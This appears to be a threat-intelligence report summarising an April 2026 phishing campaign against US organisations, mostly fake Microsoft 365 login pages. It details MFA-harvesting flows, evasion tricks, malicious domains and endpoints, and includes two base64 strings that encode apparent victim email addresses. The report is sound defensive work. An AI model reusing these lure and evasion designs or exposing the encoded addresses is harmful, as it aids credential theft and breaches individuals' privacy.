Between April 09, 2026 and April 22, 2026, analysts identified a highly sophisticated phishing campaign comprising 33 incidents that primarily targeted Microsoft and Office 365 credentials through advanced multi-stage authentication bypass techniques, with secondary targeting of Adobe, GoDaddy, and other enterprise services. The campaign demonstrated consistent use of adversary-in-the-middle (AiTM) proxying, JavaScript-based credential exfiltration through obfuscated external modules, and comprehensive multi-factor authentication harvesting capabilities that collected usernames, passwords, SMS codes, and authenticator app tokens across realistic authentication flows. Threat actors employed advanced evasion techniques including base64-encoded configuration data, randomized CSS class names, anti-bot honeypot fields, disabled right-click/text selection, and PageValidator security systems, while leveraging compromised legitimate domains (.vu, .de, .nl, .uk TLDs), Microsoft Azure infrastructure abuse, and Cloudflare-protected hosting to enhance credibility and avoid detection.
Notable emerging tactics included real-time WebSocket communication via Socket.IO for live credential forwarding, sophisticated brand impersonation spanning multiple service providers simultaneously, and the deployment of commercial-grade phishing-as-a-service kits with polymorphic code structures and professional UI animations designed to closely replicate legitimate Microsoft authentication workflows. The campaign's technical sophistication, combined with targeted personalization showing victim email addresses and systematic MFA bypass capabilities, represents a significant escalation in phishing attack complexity that poses substantial risk to organizations relying on traditional security awareness training and basic multi-factor authentication protections.
On April 20, 2026 and April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a multi-stage credential collection process that captures usernames via form submission to form_field_648, then passwords through form_box_142, followed by MFA codes through multiple verification forms (form_form_915 and form_section_533), with data likely exfiltrated through JavaScript modules loaded from the compromised capitolelectrics.com domain. The page employs several sophisticated evasion techniques including obfuscated base64-encoded configuration data (prop_flag_852, prop_status_731), randomized CSS class names to avoid detection signatures, honeypot fields with the a_block_503 class to detect automated analysis, and anti-inspection protections that disable right-click and text selection while loading bot detection modules.
The infrastructure leverages a compromised legitimate business website (capitolelectrics.com) with polymorphic JavaScript loading (module.php with dynamic parameters), and the page meticulously mimics Microsoft's authentication flow with realistic multi-factor authentication steps including authenticator app verification and SMS codes. This represents an advanced sophistication level due to its comprehensive MFA harvesting capabilities, multiple anti-analysis measures, and the realistic simulation of Microsoft's complete authentication pipeline including visual elements like blinking notification icons and entropy displays for authenticator apps.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated adversary-in-the-middle (AiTM) technique deployed through the Ultraviolet web proxy service hosted on cookieduck.com, which intercepts and proxies all traffic to the legitimate Microsoft login portal at login.microsoftonline.com while maintaining full visual fidelity. The primary credential capture method involves form submission to "https://login.microsoftonline.com/f54910a1-2cbc-42bf-9f0d-5466ba29ee46/login" but all requests are transparently proxied through the attacker's infrastructure using base64-encoded URLs in the format "aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL..." allowing real-time interception of credentials, session tokens, and MFA codes. Key TTPs include complete DOM manipulation with __uv-attr- prefixed attributes to maintain proxy functionality, JavaScript-based request interception through the Ultraviolet framework, and abuse of legitimate Microsoft SAML authentication flows. This represents an advanced sophistication level as it bypasses traditional security awareness training by presenting a pixel-perfect replica of the legitimate Microsoft login experience while capturing all authentication data in real-time, making it extremely difficult for users to detect the deception.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft login phishing page employs a sophisticated multi-stage credential harvesting system that uses JavaScript fetch() calls to exfiltrate credentials through form submissions to external endpoints, with the primary capture mechanism appearing to be through dynamically configured form handlers referenced in the obfuscated base64-encoded configuration strings. The page demonstrates advanced evasion techniques including anti-debugging protections (disabled right-click and text selection), bot detection mechanisms through honeypot fields with the "a_block_239" class, and sophisticated social engineering through authentic Microsoft branding with real Microsoft CDN background images and multi-factor authentication simulation including SMS codes, authenticator app notifications, and verification workflows.
Notable infrastructure elements include hosting on a suspicious .vu domain with an extremely long randomized URL path, and the page loads external JavaScript files ("js/bSIbdr4xaTFP1Lr.js" and "js/rPMnFG5Dwk68Lehm.js") that likely contain the primary credential exfiltration logic. The sophistication level is advanced, featuring comprehensive MFA bypass capabilities, real-time form validation, loading animations to simulate legitimate authentication delays, and extensive code obfuscation through randomized CSS class names and base64-encoded configuration objects that mask the true functionality and endpoints.
On April 21, 2026 and April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This sophisticated Microsoft authentication phishing page uses JavaScript-based multi-stage credential collection with form data being exfiltrated via fetch/XMLHttpRequest to endpoints controlled by the attackers, as evidenced by the extensive JavaScript configuration objects and module loading system. The page implements several advanced evasion techniques including anti-bot detection modules (bot-detection.js), honeypot fields with the class "a_module_306" positioned off-screen, disabled right-click and text selection, and obfuscated configuration data using base64 encoding (visible in prop_state_614 and prop_label_306 values).
The infrastructure appears to be hosted on a compromised or disposable domain (fryerclosings.cc) with a complex URL path structure containing random tokens, and the page features sophisticated social engineering with realistic Microsoft branding, multi-factor authentication simulation including SMS and authenticator app flows, and personalized elements showing "[email address from a Kentucky organization]" to build victim trust. The sophistication level is advanced, particularly notable for its comprehensive MFA collection capabilities, real-time validation system, polymorphic code structure with randomized CSS class names, and the systematic progression through username, password, and various 2FA verification methods to maximize credential harvesting.
On April 22, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a multi-stage credential harvesting approach that dynamically loads JavaScript modules to capture Microsoft login credentials, with form data likely exfiltrated via the obfuscated `module.php` endpoint using encoded parameters and polymorphic code structure. The site employs sophisticated evasion techniques including anti-bot honeypot fields, disabled text selection and right-click protection, base64-encoded configuration variables, randomly-named CSS classes, and integration with legitimate GoGuardian security services to avoid detection.
Notable TTPs include mimicking Microsoft's authentic login flow with multiple authentication stages (password, MFA codes, authenticator app verification), stealing legitimate Microsoft background images from `msauthimages.net`, and implementing detailed error handling with contextual messaging to maintain victim engagement. The infrastructure appears to be a compromised legitimate domain (`greatlakestiles.net`) hosting the phishing kit, representing a moderately sophisticated operation that combines technical evasion measures with high-fidelity social engineering that closely replicates Microsoft's actual authentication interface and workflow.
On April 22, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through a multi-stage JavaScript-based exfiltration system that mimics Microsoft's login flow, collecting email addresses, passwords, and MFA codes through form inputs that are processed by obfuscated JavaScript functions rather than traditional form POST submissions. The page employs sophisticated evasion techniques including base64-encoded configuration data (prop_text_881, prop_value_160), obfuscated function names with randomized identifiers, anti-debugging protections that disable right-click and text selection, and honeypot fields for bot detection using the a_module_215 class.
It demonstrates advanced social engineering through authentic Microsoft branding, realistic multi-factor authentication workflows including SMS codes and authenticator app verification, personalized messaging showing "[email address from a Kentucky organization]", and convincing loading animations and progress indicators. The infrastructure uses the suspicious domain tradoroex.cfd with an extremely long obfuscated URL path, and the code references external JavaScript files (hg8KV2azKWZo2Ng.js, yAYktcSKbCfWyPSS.js) that likely contain the actual credential transmission logic, indicating a highly sophisticated phishing kit with modular architecture designed to evade detection and successfully harvest complete authentication credentials.
On April 21, 2026, an employee at a Minnesota organization clicked the above phishing page. This phishing page uses a multi-stage credential capture technique that initially submits credentials via AJAX POST to "processmail.php" and implements a sophisticated fake MFA flow by requesting OTP codes through a second form posting to "process.php". The site employs brand impersonation by mimicking Adobe Document Cloud with logos and styling, presents multiple email provider options (Outlook, Office365, Yahoo, AOL) to cast a wide net, and uses social engineering tactics including urgency ("enter valid email credentials that this file was sent to") and fake error messages ("Incorrect Password" after first attempt to encourage re-entry).
The page demonstrates moderate sophistication through its multi-modal approach, JavaScript-driven form handling that prevents actual form submission while capturing data via AJAX, animated loading indicators and progress flows to maintain user engagement, and a realistic two-factor authentication simulation that likely captures both passwords and MFA codes. The infrastructure appears to use a custom domain (ta-eq7.im) with Cloudflare services, and the professional styling with Bootstrap framework and Font Awesome icons suggests this is part of a well-developed phishing kit rather than a basic credential harvester.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a standard HTML form that POSTs credentials to "https://fileopen.sustainableimpactpower.de/NNbg4/index.php" upon submission, with basic Bootstrap styling to mimic a legitimate login interface. The page employs minimal social engineering with a generic "Sign in to your account" title and uses the suspicious domain "sustainableimpactpower.de" which appears to be either compromised or attacker-controlled infrastructure rather than legitimate cloud hosting. The technique is basic credential harvesting without any JavaScript-based exfiltration, anti-analysis measures, or sophisticated evasion techniques - just a straightforward form submission to capture username/password pairs. The overall sophistication level is low, representing a standard credential phishing approach without advanced features like real-time validation, multi-factor authentication collection, or dynamic content manipulation.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft-themed phishing page employs a multi-stage credential collection process that captures email addresses and passwords through standard form submissions while using Socket.IO WebSocket connections for real-time communication with the attacker's server. The page implements sophisticated social engineering tactics including Microsoft Authenticator app impersonation with fake two-factor authentication codes, urgency messaging about "sensitive information" verification, and detailed Microsoft Office 365 branding with legitimate Microsoft CDN resources for logos and styling.
The infrastructure leverages the domain "adetechmechanic.com" which appears to be a compromised or purchased domain rather than a major cloud service, and the URL contains base64-encoded parameters that likely contain victim targeting information and session tracking data. The sophistication level is moderate-to-advanced due to the real-time WebSocket communication capabilities, multi-factor authentication bypass techniques, and the comprehensive Microsoft ecosystem impersonation that includes OneDrive interface elements and detailed Office 365 styling.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft phishing page uses JavaScript-based credential exfiltration through a dynamically loaded module (module.php) rather than standard form POST submission, with multi-stage collection capturing email, password, and MFA codes across different sections. Key TTPs include extensive code obfuscation with base64-encoded configuration data, randomized CSS class names for evasion, honeypot fields for bot detection, anti-inspection techniques (disabled right-click, text selection), and sophisticated UI mimicry including Microsoft branding, loading animations, and realistic error messages.
The page is hosted on a suspicious domain (clbruks.com) with a long obfuscated path, implements real-time view transitions between authentication stages, and includes anti-analysis measures like GoGuardian script injection detection and polymorphic code structure with security tokens and timestamps. This represents an advanced phishing kit with sophisticated evasion capabilities, multi-factor authentication bypass, and professional-grade social engineering elements designed to capture complete Microsoft account credentials and bypass modern security measures.
On April 21, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated multi-layered JavaScript-based credential capture system that appears to exfiltrate data through external JavaScript files (vhe4vF13CCpvIGp.js and WddTubribbvyFHXg.js) rather than traditional form submission, with the actual endpoints obfuscated within those external scripts. The page employs several advanced evasion techniques including anti-bot honeypot fields (a_block_105 class with hidden positioning), comprehensive anti-analysis measures that disable right-click and text selection, user-agent filtering through a PageValidator system with development and strict presets, and sophisticated loading screens with Microsoft-branded animations to increase legitimacy.
The infrastructure leverages the suspicious domain "monilyex.cfd" with an extremely long obfuscated URL path, while the page meticulously mimics Microsoft's authentic login interface including legitimate Microsoft CDN resources for background images, official Segoe UI font stacks, and accurate color schemes (#0067b8 Microsoft blue). The sophistication level is advanced, particularly notable for its comprehensive anti-debugging protections, the PageValidator security system that appears to fingerprint the environment before allowing access, and the use of base64-encoded configuration values in the phpConfig object that likely contain the actual exfiltration endpoints.
On April 20, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page appears to be an attack simulation framework rather than an active credential harvesting attempt, as evidenced by the title "Attack Simulation" and extensive JavaScript code for educational overlays and modals explaining phishing techniques to users. The page mimics a Microsoft Office 365 login interface with sophisticated visual elements including Microsoft branding, Segoe UI fonts, and responsive design, but the primary functionality focuses on displaying educational content through various overlay components (modal dialogs, tooltips, and notification banners) rather than actual credential capture.
The infrastructure appears to be hosted on a legitimate domain (officentry.com) and includes professional-grade CSS frameworks and accessibility features, suggesting this is a sanctioned security awareness training tool rather than a malicious phishing kit. The sophistication level is moderate to advanced in terms of visual fidelity and user experience design, but the technical implementation prioritizes education delivery over credential theft, making this appear to be a legitimate phishing simulation used for security training purposes.
Timeline by Organization:
On April 13, 2026, April 14, 2026, April 17, 2026, and April 20, 2026, employees at a Georgia organization clicked the above phishing page.
On April 13, 2026, April 14, 2026, April 16, 2026, and April 20, 2026, employees at a Kentucky organization clicked the above phishing page.
On April 20, 2026, an employee at a Minnesota organization clicked the above phishing page.
On April 14, 2026, an employee at a Utah organization clicked the above phishing page.
This phishing page primarily uses social engineering and fake security alerts rather than traditional credential capture - there are no active form submissions or JavaScript exfiltration methods, as all input fields are disabled with the "disabled" attribute. The page employs sophisticated visual deception tactics including a convincing Microsoft Support interface clone, multiple fake security pop-ups displaying "Password required for System32" and "Memory access violation" errors, fake SmartScreen warnings, and a prominent phone number (+1 (855)509-6686) presented as the primary call-to-action across multiple UI elements. Hosted on Microsoft Azure's web.core.windows.net infrastructure and delivered via Facebook advertising (evident from fbclid and utm parameters), this represents a moderate sophistication tech support scam that relies entirely on phone-based social engineering rather than automated credential theft. The page is notable for its comprehensive visual mimicry of Windows security interfaces and its use of legitimate Microsoft hosting to enhance credibility, but lacks any actual malicious code execution or data collection mechanisms.
Related subdomain variants:
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page employs sophisticated Microsoft Azure Active Directory impersonation with credential capture primarily through form POST to "/common/login" on the malicious domain ranksizexxl.club, while implementing extensive JavaScript-based evasion techniques including base64-encoded username parameters (bG9yZWxsZS53b290b25AbGVzbGllLmt5c2Nob29scy51cw==), browser fingerprinting through the $Config object, and anti-debugging mechanisms via WebWatson error handling systems.
The infrastructure demonstrates advanced tactics by hosting the phishing kit on a disposable domain while maintaining references to legitimate Microsoft CDN resources (aadcdn.msftauth.net) to blend malicious and legitimate content, and incorporates real-time session state management through multiple endpoints including GetCredentialType and GetOneTimeCode for potential MFA bypass attempts. The sophistication level is advanced due to the comprehensive replication of Microsoft's authentication flow, extensive JavaScript obfuscation and evasion techniques, targeted victim pre-filling (decoded email suggests educational institution targeting), and the multi-stage credential collection process that mimics legitimate OAuth flows while redirecting to attacker infrastructure.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page uses a standard HTML form submission method for credential capture, posting to an unspecified endpoint (the form action is not visible in the provided HTML snippet). The page employs several notable TTPs including base64 encoding in the URL fragment (#bGF1cmEuZ29yZG9uQHNoZWxieS5reXNjaG9vbHMudXM=) which decodes to what appears to be a target email address, extensive CSS obfuscation using randomized class names to evade detection, and integration with Socket.IO (loaded from cdnjs.cloudflare.com) suggesting potential real-time communication capabilities.
The page is hosted on a suspicious domain "the-healthy-foods.com" with a complex subdomain structure and an extremely long URL path containing random words, indicating a compromised or purpose-built phishing infrastructure. This represents a moderate sophistication level with the Socket.IO integration being particularly noteworthy as it could enable real-time credential forwarding or multi-stage attack coordination.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This appears to be a sophisticated phishing page that impersonates Microsoft login while leveraging legitimate infrastructure for evasion. The page uses extensive CSS obfuscation with randomized class names (like "CHyAgqPbx_yuoH5uy3fA" and "WMxS1J6ioJ9mX7X1") and loads JavaScript libraries from employer.ipers.org, suggesting either compromised legitimate infrastructure or abuse of a trusted Iowa IPERS employer portal.
The credential capture method is not visible in the provided HTML truncation, but the page implements multiple layers of browser compatibility checking, uses legitimate jQuery CDN resources, and includes complex UI masking functions (window.VITECH.GWT.maskHTMLBody) that could hide malicious form submission endpoints. The sophistication level is moderate to advanced given the infrastructure abuse, extensive CSS obfuscation for anti-analysis, professional Microsoft branding mimicry, and the use of multiple overlapping UI frameworks that suggest this is part of a well-resourced phishing kit rather than a basic credential harvester.
On April 20, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft login phishing page uses JavaScript-based credential exfiltration through a dynamically loaded module (js/module.php) rather than traditional form POST submission, with credentials captured through multiple stages mimicking the authentic Microsoft authentication flow including username, password, MFA codes, and authenticator app verification. The page employs sophisticated evasion techniques including obfuscated configuration data stored in base64-encoded variables, anti-bot honeypot fields positioned off-screen, disabled text selection and right-click functionality, and polymorphic JavaScript loading with security tokens and timestamps.
Notable infrastructure indicators include hosting on prochemsgroup.net with an extremely long obfuscated URL path, and the page implements advanced social engineering through pixel-perfect Microsoft branding replication, realistic multi-step authentication flows with loading animations, and personalized elements showing "[email address from a Kentucky organization]" to increase victim trust. The sophistication level is advanced due to the real-time credential validation capabilities suggested by the bot detection modules, the complex state management system tracking user progression through authentication stages, and the professional implementation that closely mirrors legitimate Microsoft login processes including proper responsive design and accessibility features.
On April 20, 2026, an employee at a Illinois organization clicked the above phishing page. This phishing page uses a standard HTML form POST to "https://daubert.onthecornermanila.com/sos?redirect_urI=https%253A%252F%252Flogin.microsoftonline.com%252Fcommon%252Flogin" to capture Microsoft Office 365 credentials, with sophisticated Microsoft branding replication including authentic-looking CSS, JavaScript, and Microsoft logo assets loaded from legitimate Microsoft CDNs (aadcdn.msftauth.net). The page implements several notable TTPs including extensive JavaScript obfuscation with encoded configuration objects containing legitimate Microsoft OAuth URLs and session tokens, DNS prefetching to Microsoft domains to appear legitimate, and real Microsoft authentication flow simulation with proper CSRF tokens and session management.
The infrastructure uses a compromised or malicious domain (daubert.onthecornermanila.com) that redirects through encoded URLs to mask the final POST destination, while loading genuine Microsoft assets to maintain visual authenticity. This represents a moderate to advanced sophistication level due to its detailed replication of Microsoft's actual login infrastructure, proper implementation of anti-CSRF mechanisms, and the hybrid approach of using legitimate Microsoft CDN resources while intercepting credentials through the malicious domain's POST endpoint.
On April 20, 2026, an employee at a Minnesota organization clicked the above phishing page. This sophisticated Microsoft login phishing kit uses multi-stage JavaScript-based credential collection, capturing email, password, and MFA codes through fetch() requests to backend endpoints rather than simple form submissions, as evidenced by the complex state management system with randomized variable names (var_context_865, var_settings_582) and encoded configuration strings. The kit implements advanced evasion techniques including anti-debugging measures (user-select: none, right-click disabled), honeypot fields for bot detection (a_component_103 class with hidden positioning), randomized CSS class names throughout the codebase, and PageValidator/PageConfig security detection systems that likely fingerprint visitors and redirect suspicious traffic.
The infrastructure leverages Cloudflare services (evident from the beacon script) and includes base64-encoded configuration parameters, loading screen animations to appear legitimate, and a complete multi-step authentication flow mimicking Microsoft's actual login process including authenticator app verification and SMS 2FA collection. The sophistication level is advanced, featuring real-time form validation, dynamic content updates, and what appears to be a professionally developed phishing-as-a-service kit with extensive anti-analysis capabilities and multiple external JavaScript dependencies for enhanced functionality.
On April 20, 2026, an employee at a Kentucky and Texas organization clicked the above phishing page. This phishing page uses a standard HTML form POST submission method to capture Microsoft 365 credentials, with the form likely submitting to the same domain or a backend script for credential harvesting. The page employs sophisticated Microsoft 365/Office 365 brand impersonation with authentic-looking styling, logos (including base64-encoded Microsoft logos), and CSS classes that mimic legitimate Microsoft login interfaces, creating a highly convincing replica of the real Office 365 sign-in experience.
The page is hosted on a suspicious domain (eminencekyschool.steadyoperations.de) that appears to be either a compromised legitimate site or a domain registered specifically for this campaign, using a German TLD to potentially appear more trustworthy. The sophistication level is moderate to advanced, as evidenced by the extensive CSS styling that closely replicates Microsoft's Fluent Design System, the use of proper form validation patterns, and the inclusion of multiple UI components like checkboxes, progress indicators, and responsive design elements that would fool most users. Notably, the page includes comprehensive GoDaddy branding and styling alongside Microsoft elements, suggesting this may be part of a broader campaign targeting multiple service providers or attempting to create confusion about the legitimate service being impersonated.
On April 17, 2026, an employee at a Florida organization clicked the above phishing page. This phishing page uses a standard HTML form that POSTs credential data to the same endpoint via an AJAX request using jQuery, with the captured email and password being sent to a validation endpoint identified by obfuscated variables 'validate' and 'verify' in the heavily obfuscated JavaScript code. The page employs several sophisticated evasion techniques including extensive JavaScript obfuscation using custom encoding schemes, anti-bot honeypot fields that redirect to a decoy URL if triggered, and multiple layers of string encoding/decoding functions that obscure the actual credential exfiltration logic.
The site impersonates both GoDaddy and Microsoft Office 365 branding simultaneously, includes caps lock detection, password visibility toggles, and appears to validate credentials in real-time before proceeding, suggesting integration with automated credential verification systems. The infrastructure leverages the .vu domain (Vanuatu) with what appears to be a compromised or bulletproof hosting setup, and the sophistication level is advanced due to the multi-layered obfuscation, anti-analysis measures, and dual-brand impersonation strategy designed to capture both hosting provider and email service credentials.
On April 17, 2026, an employee at a Illinois organization clicked the above phishing page. This phishing page uses a multi-stage credential capture system that collects Microsoft login credentials through standard HTML forms, with JavaScript handling progressive form submission and data exfiltration via a dynamically loaded module (module.php?m=auth) that processes username, password, and multi-factor authentication codes sequentially. The page implements sophisticated evasion techniques including obfuscated JavaScript variable names, base64-encoded configuration data, honeypot anti-bot fields, disabled right-click/text selection, and polymorphic code structure with randomized CSS class names and element IDs to evade detection systems.
Notable advanced features include real-time 2FA method detection that adapts the interface based on victim's authentication setup (SMS, authenticator app, or email verification), dynamic background/logo customization, and anti-debugging protections with noscript redirects and developer tool detection. The infrastructure appears to leverage a compromised Brazilian domain (grupoalvoseg.com.br) with a complex URL structure containing encoded parameters, and the code quality suggests this is a sophisticated phishing kit rather than a basic credential harvester, likely capable of real-time credential validation and session hijacking.
On April 16, 2026 and April 17, 2026, employees at a Florida organization clicked the above phishing page. This Microsoft phishing page uses JavaScript-based credential exfiltration through the external scripts "tNXeHk14j2U313v.js", "bfgIX3aCsk19HgYr.js", and "FV1OcOognlhxJjkoDp9.js" rather than traditional form submission, with multi-stage credential collection spanning username, password, and MFA codes across different sections. The page implements sophisticated evasion techniques including anti-bot detection through the PageValidator security handler, anti-debugging protections that disable right-click and text selection, honeypot fields using the "a_wrapper_835" class positioned off-screen, and base64-encoded configuration data in variables like "var_state_402" and "var_settings_955" to obfuscate functionality.
Hosted on what appears to be a compromised UK scaffolding company domain (infoaescaffoldinq.co.uk), this represents an advanced phishing kit with real-time validation capabilities, animated loading screens to appear legitimate, and comprehensive Microsoft 365 authentication flow simulation including Authenticator app integration and SMS verification. The sophisticated obfuscation, multi-vector evasion techniques, and professional UI implementation suggest this is a high-quality phishing-as-a-service tool rather than a basic credential harvester.
On April 16, 2026, an employee at a Florida organization clicked the above phishing page. This GoDaddy-impersonating phishing page captures credentials through a JavaScript-obfuscated AJAX submission mechanism that uses jQuery's $.ajax() to POST email and password data to a validation endpoint, with the obfuscated code containing encoded strings and anti-analysis techniques including caps lock detection and honeypot fields positioned off-screen to evade bots. The page employs sophisticated social engineering by pre-populating a Florida organization's email address, mimicking authentic GoDaddy branding with legitimate logos and styling, and includes multi-stage validation with error handling that suggests real-time credential verification against legitimate services.
The infrastructure uses a suspicious domain "russelaiklinvestmentgroup.club" with an extremely long encoded URL path, and the heavily obfuscated JavaScript code contains security tokens, timestamps, and redirect mechanisms to random legitimate sites if honeypot fields are triggered. This represents a moderately sophisticated operation with advanced obfuscation techniques, anti-bot measures, and targeted personalization that goes well beyond basic form-based credential theft, indicating an organized phishing kit designed to evade automated detection while maximizing credential harvesting success rates.
On April 16, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated multi-stage credential capture mechanism that intercepts Microsoft OAuth flows by hosting malicious endpoints on the compromised domain "pacifcprime.com" (note the typo - missing "i" in "Pacific"). The primary credential capture method involves form POST submissions to "https://log1nhzkivbmlfm6lwmkc3e0afpak7.portal.pacifcprime.com/common/login" with extensive JavaScript configuration that mimics legitimate Microsoft authentication services, including OAuth state parameters, CSRF tokens (canary), and session management.
The page demonstrates advanced TTPs including legitimate Microsoft CDN resource loading (aadcdn.msauth.net) to appear authentic, comprehensive browser fingerprinting and device capability detection, and real-time credential validation infrastructure with multiple fallback endpoints for MSA and AAD authentication flows. The sophistication is notably high as it implements a complete OAuth flow interception system with proper state management, PKCE parameters, and even includes legitimate Microsoft branding assets and JavaScript frameworks, making it extremely difficult for users to distinguish from authentic Microsoft login pages.
On April 14, 2026 and April 15, 2026, employees at a Kentucky organization clicked the above phishing page. Looking at this HTML content, the primary credential capture method appears to be a traditional HTML form submission using POST requests to endpoints controlled by the threat actor, with the form action likely set dynamically via JavaScript (though the specific endpoint isn't visible in this static HTML). The page demonstrates sophisticated social engineering through detailed Microsoft Office 365/GoDaddy brand impersonation using extensive CSS styling and legitimate-looking logos (including base64-encoded images), creates urgency through a "Sharing Link Validation" theme, and employs evasion techniques including extensive CSS obfuscation and complex DOM manipulation to avoid detection.
The infrastructure leverages the compromised or malicious domain "feedingamerica.steadyoperations.de" which abuses the legitimate charity brand "Feeding America" to increase victim trust, while the sophisticated multi-brand impersonation (both Microsoft and GoDaddy elements present) suggests this is a moderate-to-advanced phishing kit designed to capture credentials from users who believe they're accessing a legitimate file sharing validation page. The presence of detailed form validation, professional styling with multiple CSS frameworks (Bootstrap, custom Microsoft-style components), and complex JavaScript frameworks indicates this is not a basic phishing attempt but rather a well-crafted credential harvesting operation.
On April 15, 2026, employees at a Minnesota organization clicked the above phishing page. Looking at the provided HTML content, this appears to be an incomplete phishing page that only contains Bootstrap CSS framework styling and basic HTML structure without any functional credential capture mechanisms. The HTML shows a standard login page template with the title "Sign in to your account" and extensive Bootstrap styling, but critically lacks any actual form elements, JavaScript code, or submission endpoints that would enable credential theft.
The URL uses a suspicious pattern with "coverupwindowwells.executionwithconfidence.de" followed by a random path "/jlv8J/#" which suggests a compromised or maliciously registered domain, but without the complete page content including form fields and submission logic, no active credential capture method can be identified. This represents either an incomplete phishing kit deployment or a partially loaded page, making it essentially non-functional at the basic sophistication level, though the professional Bootstrap styling suggests the attackers intended to create a convincing Microsoft-like login interface once fully implemented.
On April 15, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft phishing page uses a sophisticated multi-stage credential harvesting approach that captures usernames, passwords, and 2FA codes through JavaScript form handling without visible form POST endpoints, suggesting real-time exfiltration via obfuscated external scripts (fWscvhBQB3xEJLf.js and ZIp3ZJXpQ34zkqRJ.js). The page employs advanced evasion techniques including randomized CSS class names throughout the code, anti-inspection protection that disables right-click and text selection, honeypot fields for bot detection, and base64-encoded configuration strings like "U2lnbi1pbiBvcHRpb25z" and "aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20=".
Notable social engineering elements include a realistic Microsoft authentication flow with loading animations, progressive credential collection mimicking legitimate MFA processes, and the domain "kenexacdmoorporation.click" targeting Kentucky organization users with personalized text "[email address from a Kentucky organization]". The sophistication level is advanced due to the comprehensive anti-analysis measures, multi-factor authentication simulation, and the use of external JavaScript files that likely contain the actual credential exfiltration logic while keeping the main HTML relatively clean of obvious malicious indicators.
On April 14, 2026, an employee at a Georgia organization clicked the above phishing page. This sophisticated phishing page implements a multi-stage Microsoft authentication simulation with credential capture through JavaScript fetch requests to unspecified endpoints, incorporating obfuscated configuration data via base64 encoding (prop_text_730, var_info_828) and randomized CSS class names for evasion. The page features advanced social engineering tactics including realistic Microsoft branding, multi-factor authentication workflows (SMS codes, authenticator app verification), anti-bot honeypot fields (a_block_263), user-select disabling, and animated loading screens to increase perceived legitimacy.
Hosted on a suspicious domain (advancedmicrodevicesglobal.monivoeu.cfd) with Cloudflare protection, the kit demonstrates high sophistication through its modular JavaScript architecture, dynamic view transitions between authentication steps, real-time form validation, and comprehensive MFA token collection capabilities. The presence of security detection bypasses, extensive obfuscation, and professional UI animations indicate this is likely a commercial phishing-as-a-service kit rather than a basic credential harvester.
On April 10, 2026, employees at a Florida organization clicked the above phishing page. This phishing page uses a standard HTML form submission method for credential capture, posting to "./assets/login.php" when users enter their credentials. The page employs Microsoft brand impersonation with authentic-looking styling and uses the title "Sign in to your account" to mimic legitimate Microsoft login interfaces.
The infrastructure appears to be hosted on a German domain (visibilitydriven.de) with a subdirectory structure suggesting either compromised hosting or deliberate misdirection using a legitimate-sounding business domain. The sophistication level is basic, relying primarily on visual mimicry through Bootstrap CSS framework and standard form elements without any advanced JavaScript-based credential exfiltration, anti-analysis techniques, or real-time validation mechanisms. The most notable aspect is the clean, professional appearance that closely replicates Microsoft's authentication interface, making it potentially effective against less security-aware users despite its technical simplicity.
On April 10, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures Microsoft credentials through a standard form POST to "/common/login" on the same malicious domain (boncheumbrella.mom), while masquerading as a legitimate Microsoft sign-in page with sophisticated visual mimicry including authentic-looking CSS, JavaScript, and page structure copied from real Microsoft login infrastructure. The page employs several notable evasion techniques including DNS prefetching to legitimate Microsoft CDN domains (aadcdn.msauth.net, aadcdn.msftauth.net) to appear authentic, JavaScript-based browser capability detection and user-agent analysis, and multiple redirect URLs that point back to the malicious domain instead of legitimate Microsoft endpoints throughout the configuration object.
The infrastructure uses a suspicious domain (boncheumbrella.mom) but leverages legitimate Microsoft CSS and JavaScript frameworks to create a convincing replica, with the configuration containing authentic-looking OAuth parameters, session tokens, and Microsoft branding elements. This represents a moderate sophistication level due to the comprehensive replication of Microsoft's login interface and the clever redirect URL manipulation that maintains the illusion of legitimacy while capturing credentials locally.
On April 10, 2026, an employee at a Texas organization clicked the above phishing page. This phishing page uses a multi-stage credential capture technique where form data is first submitted via AJAX POST to "processmail.php" and subsequent OTP collection is handled by "process.php", implementing a sophisticated social engineering flow that mimics legitimate multi-factor authentication processes. The site impersonates Adobe's Greenvelope service while offering multiple email provider login options (Outlook, Office365, Yahoo, AOL) and employs several notable TTPs including forced error messaging ("Incorrect Password" on first attempt to appear legitimate), a realistic OTP collection workflow with countdown timer (5-minute window), and modal-based UI that prevents easy navigation away from the credential collection forms.
The page demonstrates moderate sophistication through its multi-stage JavaScript handling that simulates real authentication failures, dynamic content switching between different email providers, and the inclusion of fake loading animations and OTP delivery notifications to enhance credibility. The infrastructure appears to be hosted on a compromised or malicious domain (timefortheeventcard.nl) with Cloudflare protection, and the site includes commented-out AJAX code suggesting the attackers may still be developing or testing the exfiltration mechanisms.
On April 09, 2026, an employee at a Nevada organization clicked the above phishing page. This phishing page uses a standard HTML form POST method to capture credentials, submitting to "processmail.php" for initial login collection and "process.php" for OTP collection through a sophisticated multi-stage credential harvesting operation. The site impersonates Greenvelope (online invitations service) while targeting multiple email providers (Outlook, Office365, Yahoo, AOL) and employs a two-factor authentication bypass technique by collecting both passwords and SMS-based OTP codes through sequential modal dialogs with realistic timing delays and countdown timers.
